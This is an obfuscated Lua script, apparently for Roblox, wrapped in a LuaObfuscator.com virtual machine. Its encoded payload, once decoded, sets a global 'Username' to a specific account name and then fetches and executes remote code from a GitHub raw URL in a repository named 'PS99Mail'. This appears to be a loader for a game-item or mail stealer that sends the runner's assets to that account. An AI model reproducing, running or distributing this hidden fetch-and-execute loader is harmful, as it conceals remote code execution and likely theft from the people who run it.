--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=0;local v35;local v36;local v37;while true do if (v34==1) then v37=v31[3];return function(...)local v75=v35;local v76=v36;local v77=v37;local v78=v28;local v79=1;local v80= -1;local v81={};local v82={...};local v83=v12("#",...) -1 ;local v84={};local v85={};for v93=0,v83 do if (v93>=v77) then v81[v93-v77 ]=v82[v93 + 1 ];else v85[v93]=v82[v93 + 1 ];end end local v86=(v83-v77) + 1 ;local v87;local v88;while true do local v94=0;while true do if (0==v94) then v87=v75[v79];v88=v87[1];v94=1;end if (v94==1) then if (v88<=5) then if (v88<=2) then if (v88<=0) then local v111=0;local v112;while true do if (v111==0) then v112=v87[2];v85[v112]=v85[v112](v13(v85,v112 + 1 ,v80));break;end end elseif (v88>1) then local v121=0;local v122;local v123;local v124;local v125;local v126;while true do if (v121==1) then v33[v87[3]]=v85[v87[2]];v79=v79 + 1 ;v87=v75[v79];if ((v87[3]=="_ENV") or (v87[3]=="getfenv")) then v85[v87[2]]=v33;else v85[v87[2]]=v33[v87[3]];end v121=2;end if (v121==8) then v87=v75[v79];v85[v87[2]]();v79=v79 + 1 ;v87=v75[v79];v121=9;end if (v121==2) then v79=v79 + 1 ;v87=v75[v79];if ((v87[3]=="_ENV") or (v87[3]=="getfenv")) then v85[v87[2]]=v33;else v85[v87[2]]=v33[v87[3]];end v79=v79 + 1 ;v121=3;end if (5==v121) then v79=v79 + 1 ;v87=v75[v79];v126=v87[2];v123,v124=v78(v85[v126](v13(v85,v126 + 1 ,v87[3])));v121=6;end if (v121==6) then v80=(v124 + v126) -1 ;v122=0;for v169=v126,v80 do local v170=0;while true do if (v170==0) then v122=v122 + 1 ;v85[v169]=v123[v122];break;end end end v79=v79 + 1 ;v121=7;end if (3==v121) then v87=v75[v79];v126=v87[2];v125=v85[v87[3]];v85[v126 + 1 ]=v125;v121=4;end if (v121==7) then v87=v75[v79];v126=v87[2];v85[v126]=v85[v126](v13(v85,v126 + 1 ,v80));v79=v79 + 1 ;v121=8;end if (9==v121) then v79=v87[3];break;end if (v121==4) then v85[v126]=v125[v87[4]];v79=v79 + 1 ;v87=v75[v79];v85[v87[2]]=v87[3];v121=5;end if (v121==0) then v122=nil;v123,v124=nil;v125=nil;v126=nil;v121=1;end end else do return;end end elseif (v88<=3) then for v118=v87[2],v87[3] do v85[v118]=nil;end elseif (v88==4) then v79=v87[3];else v33[v87[3]]=v85[v87[2]];end elseif (v88<=8) then if (v88<=6) then if (v85[v87[2]]==v87[4]) then v79=v79 + 1 ;else v79=v87[3];end elseif (v88>7) then local v131=v87[2];local v132,v133=v78(v85[v131](v13(v85,v131 + 1 ,v87[3])));v80=(v133 + v131) -1 ;local v134=0;for v139=v131,v80 do local v140=0;while true do if (v140==0) then v134=v134 + 1 ;v85[v139]=v132[v134];break;end end end elseif ((v87[3]=="_ENV") or (v87[3]=="getfenv")) then v85[v87[2]]=v33;else v85[v87[2]]=v33[v87[3]];end elseif (v88<=9) then local v113=v87[2];local v114=v85[v87[3]];v85[v113 + 1 ]=v114;v85[v113]=v114[v87[4]];elseif (v88==10) then v85[v87[2]]();else v85[v87[2]]=v87[3];end v79=v79 + 1 ;break;end end end end;end if (v34==0) then v35=v31[1];v36=v31[2];v34=1;end end end return v30(v29(),{},v17)(...);end if (v18==2) then function v23()local v38,v39=v1(v16,v19,v19 + (5 -3) );v19=v19 + 2 ;return (v39 * (732 -476)) + v38 ;end v24=nil;function v24()local v40,v41,v42,v43=v1(v16,v19,v19 + (5 -2) );v19=v19 + (10 -6) ;return (v43 * (16777835 -(555 + 64))) + (v42 * ((67035 -(367 + 201)) -(857 + 74))) + (v41 * 256) + v40 ;end v25=nil;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v44)if (v1(v44,2)==79) then local v68=0;while true do if (v68==0) then v20=v0(v3(v44,1,1));return "";end end else local v69=v2(v0(v44,16));if v20 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v69,v20);v20=nil;v89=1;end end else return v69;end end end);v21=nil;v18=1;end if (v18==1) then function v21(v45,v46,v47)if v47 then local v70=(v45/((929 -(214 + 713))^(v46-(1 + 0))))%((1 + 1)^(((v47-1) -(v46-(878 -(282 + 595)))) + (1638 -(1523 + 114)))) ;return v70-(v70%(1 + 0)) ;else local v71=(2 -0)^(v46-(1066 -((185 -(32 + 85)) + 997))) ;return (((v45%(v71 + v71))>=v71) and ((1246 + 25) -(51 + 175 + 1044))) or (0 -0) ;end end v22=nil;function v22()local v48=957 -(892 + 65) ;local v49;while true do if (v48==(2 -1)) then return v49;end if (v48==((180 -(67 + 113)) -0)) then v49=v1(v16,v19,v19);v19=v19 + (1 -0) ;v48=351 -(87 + 263) ;end end end v23=nil;v18=2;end if (v18==3) then function v25()local v50=v24();local v51=v24();local v52=(1139 -(116 + 1022)) -0 ;local v53=(v21(v51,1 + 0 ,20) * ((4 -2)^(24 + 8))) + v50 ;local v54=v21(v51,65 -44 ,123 -92 );local v55=((v21(v51,984 -(802 + 150) )==1) and  -(2 -1)) or 1 ;if (v54==(0 -(0 -0))) then if (v53==(0 + 0)) then return v55 * (0 -0) ;else v54=998 -(538 + 377 + 82) ;v52=0 -0 ;end elseif (v54==(1193 + 854)) then return ((v53==(0 -0)) and (v55 * ((1188 -((3902 -2833) + 118))/(0 -(0 -0))))) or (v55 * NaN) ;end return v8(v55,v54-(2237 -1214) ) * (v52 + (v53/((2 + 0)^(10 + 42)))) ;end v26=nil;function v26(v56)local v57=859 -(814 + 45) ;local v58;local v59;while true do if (v57==((13 -9) -2)) then v59={};for v91=1 + 0 , #v58 do v59[v91]=v2(v1(v3(v58,v91,v91)));end v57=2 + 1 ;end if (v57==(888 -(261 + 624))) then return v6(v59);end if (v57==(0 -0)) then v58=nil;if  not v56 then local v95=0;while true do if (v95==(1080 -(1020 + 60))) then v56=v24();if (v56==(1423 -(630 + (2540 -(760 + 987))))) then return "";end break;end end end v57=(1916 -(1789 + 124)) -2 ;end if (v57==(4 -(769 -(745 + 21)))) then v58=v3(v16,v19,(v19 + v56) -(1 + 0) );v19=v19 + v56 ;v57=2;end end end v27=v24;v18=4;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v60=0 + 0 ;local v61;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v60~=(1 + 2)) then else v67=nil;while true do if (2~=v61) then else local v96=0 + 0 ;local v97;while true do if ((836 -(660 + 176))~=v96) then else v97=0 + 0 ;while true do local v109=202 -(14 + 188) ;while true do if (v109==0) then if (v97==0) then local v120=0;while true do if (v120~=0) then else for v164=1,v24() do local v165=675 -(534 + 141) ;local v166;while true do if (0~=v165) then else v166=v22();if (v21(v166,1,1 + 0 )==0) then local v181=0;local v182;local v183;local v184;local v185;local v186;while true do if (v181==(1 + 0)) then v184=nil;v185=nil;v181=2;end if (v181==0) then v182=0 + 0 ;v183=nil;v181=1;end if (v181~=2) then else v186=nil;while true do if (v182~=2) then else while true do if (v183==(3 -1)) then if (v21(v185,1 -0 ,2 -1 )==(1 + 0)) then v186[2 + 0 ]=v67[v186[398 -(115 + 281) ]];end if (v21(v185,2,2)~=(2 -1)) then else v186[3 + 0 ]=v67[v186[7 -4 ]];end v183=10 -7 ;end if (v183==3) then if (v21(v185,3,870 -(550 + 317) )~=(1 -0)) then else v186[4]=v67[v186[4 -0 ]];end v62[v164]=v186;break;end if (v183~=0) then else local v189=0;local v190;while true do if (v189==(0 -0)) then v190=285 -(134 + 151) ;while true do if (v190==1) then v183=1666 -(970 + 695) ;break;end if (v190~=(0 -0)) then else local v199=1990 -(582 + 1408) ;while true do if (v199==0) then v184=v21(v166,6 -4 ,3 -0 );v185=v21(v166,4,22 -16 );v199=1;end if (v199==1) then v190=1;break;end end end end break;end end end if (v183~=(1825 -(1195 + 629))) then else local v191=0 -0 ;while true do if (v191==(241 -(187 + 54))) then local v198=0;while true do if (v198~=(780 -(162 + 618))) then else v186={v23(),v23(),nil,nil};if (v184==0) then local v200=0 -0 ;local v201;local v202;while true do if (v200==(0 -0)) then v201=0;v202=nil;v200=1 + 0 ;end if (v200==(1637 -(1373 + 263))) then while true do if (v201==0) then v202=1000 -(451 + 549) ;while true do if (v202~=0) then else v186[3]=v23();v186[2 + 2 ]=v23();break;end end break;end end break;end end elseif (v184==(1 -0)) then v186[4 -1 ]=v24();elseif (v184==2) then v186[3]=v24() -(2^(1400 -(746 + 638))) ;elseif (v184==3) then local v205=0 + 0 ;local v206;while true do if (v205==0) then v206=0;while true do if (v206==(0 -0)) then v186[3]=v24() -((343 -(218 + 123))^(1597 -(1535 + 46))) ;v186[4 + 0 ]=v23();break;end end break;end end end v198=1 + 0 ;end if (v198==1) then v191=561 -(306 + 254) ;break;end end end if (v191~=1) then else v183=2;break;end end end end break;end if (1==v182) then v185=nil;v186=nil;v182=1 + 1 ;end if (0==v182) then local v187=0 -0 ;while true do if (v187==(1467 -(899 + 568))) then v183=0 + 0 ;v184=nil;v187=1;end if (v187~=1) then else v182=1;break;end end end end break;end end end break;end end end for v167=2 -1 ,v24() do v63[v167-1 ]=v29();end v120=604 -(268 + 335) ;end if (v120~=(291 -(60 + 230))) then else v97=1;break;end end end if (v97~=1) then else return v65;end break;end end end break;end end end if (v61~=1) then else v66=v24();v67={};for v103=1,v66 do local v104=0;local v105;local v106;while true do if (v104~=1) then else if (v105==1) then v106=v22()~=0 ;elseif (v105==(574 -(426 + 146))) then v106=v25();elseif (v105~=(1 + 2)) then else v106=v26();end v67[v103]=v106;break;end if (v104~=(1456 -(282 + 1174))) then else v105=v22();v106=nil;v104=1;end end end v65[3]=v22();v61=813 -(569 + 242) ;end if (v61~=(0 -0)) then else v62={};v63={};v64={};v65={v62,v63,nil,v64};v61=1252 -(721 + 530) ;end end break;end if ((1273 -(945 + 326))~=v60) then else v65=nil;v66=nil;v60=7 -4 ;end if (v60~=(1 + 0)) then else v63=nil;v64=nil;v60=2;end if (v60==0) then v61=0;v62=nil;v60=1;end end end v18=5;end end end v15("LOL!073O00028O0003083O00557365726E616D6503093O004761626C6F636B3430030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120B3O00014O0003000100013O0026063O000200010001002O043O0002000100120B000100013O0026060001000500010001002O043O0005000100120B000200033O001202000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O00140001002O043O00050001002O043O00140001002O043O000200012O00013O00017O00",v9(),...);
